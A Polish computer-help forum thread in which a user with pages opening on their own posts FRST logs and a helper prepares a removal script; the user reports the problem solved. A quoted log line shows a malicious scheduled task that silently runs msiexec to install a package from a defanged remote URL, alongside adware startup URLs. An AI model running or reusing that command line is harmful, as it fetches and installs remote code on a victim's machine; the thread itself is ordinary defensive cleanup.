Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

samoczynne otwieranie się stron

#1
samoczynne otwieranie się stron
Cześć mam problem, a mianowicie co jakis czas same włączają mi sie rozne dziwne strony, wiem, że jest duzo takich tematów i wszedzie mowicie, zeby zrobić skan FRST, tyle tylko, ze jak ja go uruchamiam, to od razu jest zablokowany i nie da sie nic kliknąć, podobnie z adwcleanerem czy wpisywaniem słów w google "frst", "adw cleaner" od razu wyskakuje brak odpowiedzi. Da się cos z tym zrobić czy nie bardzo?

Poniżej wstawiam Logi, zrobiłem je w trybie awaryjnym inaczej blokowało mi dostęp do FRST itp

http://wklejto.pl/731863 <addition
http://wklejto.pl/731865 < frst
http://wklejto.pl/731866 < shortcut
 System operacyjny: windows_ten Przeglądarka: chrome
#2
RE: samoczynne otwieranie się stron
Cytat:Task: {E8499A66-FAF7-4435-9391-24140C399A32} - System32Tasks{88F2572A-21E2-0A82-36A9-B504D1ABBECE} => "msiexec" -q -i hxxps://empiralostwinc.com/llbg9sp938u2.aio <==== UWAGA
Infekcja jest widoczna, ale nie mogę przygotować skryptu usuwającego, bo logi są zniekształcone (na "wklejto" trzeba wklejać tekst, a nie plik!)
Popraw to.

Odinstaluj niepotrzebny do niczego program Akamai NetSession Interface

.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: samoczynne otwieranie się stron
http://wklejto.pl/731926 < addition
http://wklejto.pl/731927 < frst
http://wklejto.pl/731928 < shortcut
 System operacyjny: windows_ten Przeglądarka: chrome
#4
RE: samoczynne otwieranie się stron
Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:
Kod:
C:\WINDOWS\OAIaanmJULixO.exe
CHR StartupUrls: Default -> "hxxp://www.omniboxes.com/?type=hp&ts=1448633643&z=9bf492dc3689385f92ea3b7g0z7z5bcq3ccc3q2z4w&from=ient07021&uid=WDCXWD10EURX-63C57Y0_WD-WCC4J136571165711"
Task: {5703897C-6AB8-4D7A-8597-3D66ADAA15F7} - System32\Tasks\{249785E1-3314-B3E7-5572-0772950A968B} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://tropcharles.com/cl/?guid=bbn08to9qcyyoda2jtiy8a8n1gxz4925&prid=1&pid=4_1408_0
HKU\S-1-5-21-4085928039-3582263854-4287403547-1001\...\StartupApproved\Run: => "Akamai NetSession Interface"
FirewallRules: [{D17B076E-9875-4678-859F-87064F22D5F8}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6F791D2C-E581-421C-A7F5-9ABFD2B2990A}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D51051EA-1DA0-475B-B135-D40B3363F843}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{CE3E8783-A15F-413D-9FAD-650B1E5E90FF}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3B928-D335-4D88-985A-73673EB07838}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6E298DAA-7A36-4065-A796-F9FA391CBBAC}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6AE38854-D5D7-4A05-8E68-0D37D55C55C4}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{79A57D1F-6CAD-4FAB-9B66-77EE4A0F9688}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6DF74612-AD8F-4BB9-A46A-4AF99A471EEF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{581B7A6E-C5E7-462C-9459-751B348E94A0}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CCECC046-C522-47DB-90DF-FDBC096DA5BE}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{8B15C1F8-D5BC-4D80-B594-E923FA87ED4C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9438D305-C920-4B36-9747-F09C7E7BB017}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{AF30C001-C7D0-4EE4-B229-729133863E50}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5FF1BA98-E4B7-47CB-98C7-419BBE07BD15}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{CFE43E31-CDA2-44FB-80C1-12CAB97EB60B}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{BDDD3F27-5716-4640-809A-CD302609554B}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{68BF1590-C166-46DE-973B-5D583411FA9D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C08B2FCE-9227-434F-9E32-D6AFD4650AC0}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7AE9A888-C206-4646-86E1-BD51CB177058}] => (Allow) C:\WINDOWS\OAIaanmJULixO.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{1974CFA0-A8C8-49A7-B3E1-B62770690E81}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{96C9FF1F-99AD-4F5C-BDA4-F5B341E3D5D4}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{89F137DF-CBFD-41F0-AB64-FDD5713F9684}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{BF7EDC8D-3913-4C29-A2FB-FF62E4EA5FE9}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{D33C2207-E077-4DC3-8DA3-727E2D8A0901}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E5F1DDD7-DACE-4140-9D76-670ADE10453C}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{F43A5A22-9EC8-46D6-92F3-71EC7745590F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
HKU\S-1-5-21-4085928039-3582263854-4287403547-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Bartosz\AppData\Local\Akamai\netsession_win.exe [4586456 2018-04-17] (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
C:\Users\Bartosz\AppData\Local\Akamai\netsession_win.exe
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Napisz, czy program znikł?
 System operacyjny: windows_seven Przeglądarka: seamonkey
#5
RE: samoczynne otwieranie się stron
log po naprawie
http://wklejto.pl/731937
 System operacyjny: windows_ten Przeglądarka: chrome
#6
RE: samoczynne otwieranie się stron
Powinno być już OK.

(w poprzednim swoim poście napisałem "czy program znikł", a powinno być "czy problem" znikł").
 System operacyjny: windows_seven Przeglądarka: seamonkey
#7
RE: samoczynne otwieranie się stron
potwierdzam, juz nie ma zadnego problemu, dzieki za pomoc
 System operacyjny: windows_ten Przeglądarka: chrome
Programy: Polecane / Nowe / Inne




Podobne wątki (samoczynne otwieranie się stron)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Samoistne otwieranie niechcianych stron Google Chrome Cloud 6 1428 03.04.2019, 13:47
Ostatni post: Cloud
  Samoistne otwieranie niechcianych stron Google Chrome ZooMM 10 3636 19.03.2019, 13:11
Ostatni post: ZooMM
  Samoczynne otwieranie się stron internetowych Ziemniak210994 1 2427 09.02.2019, 23:15
Ostatni post: morderca

Skocz do:


Wybrane wątki (samoczynne otwieranie się stron)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Przekierowywanie przez przeglądarki na strony "reklamowe", dziwne procesy tic00 24 16242 19.03.2018 12:12
Ostatni post: Illidan
  POMOCY PENDRIVE TWORZY SKROT macuskowal 4 4947 15.03.2018 22:27
Ostatni post: macuskowal
  AntiVir Command Line Scanner for Windows - Jak usunąć? Silver102 2 1080 14.03.2018 17:27
Ostatni post: Silver102
  Brak polskich znaków w folderach po podlączeniu pendrive zgrzytek 2 4675 13.03.2018 18:41
Ostatni post: zgrzytek
  AVAST UKAZUJE ZBĘDNE PLIKI. TADEUSZ_1956 5 7296 13.03.2018 03:39
Ostatni post: TADEUSZ_1956
  Po uruchomieniu laptopa włącza się jakaś ruska strona emilka100 10 2374 13.03.2018 02:43
Ostatni post: Illidan
  Ręczne uruchamianie AV oraz powolny start systemu. raxer 1 847 13.03.2018 02:28
Ostatni post: Illidan
  Eset antywirus - deinstalacja ramirez77 4 4333 11.03.2018 21:18
Ostatni post: Michu_PL
  Po kliknieciu w program nie uruchamia sie [szpieg?] rowerzysta 3 863 11.03.2018 14:53
Ostatni post: broda99
  Wirus Browser redirect. Jak się go pozbyć? LordMefi 2 5156 08.03.2018 12:12
Ostatni post: LordMefi
  Podejrzane procesy: avguirna.exe, igfxTray, hppusg, program [wydzielone] moplefan 2 4306 06.03.2018 20:58
Ostatni post: moplefan
  Spowolnienie komputera PaTrYkus44 9 4805 24.02.2018 01:16
Ostatni post: PaTrYkus44
  gameorplay.info jak to usunąć? kingaa 1 1175 23.02.2018 20:40
Ostatni post: morderca
  Randomowe restartowanie systemu win 10 WiecznieCoś 1 4135 22.02.2018 04:41
Ostatni post: Illidan
  Włączające się cmd (wiersz poleceń) v33N 3 4211 17.02.2018 19:43
Ostatni post: broda99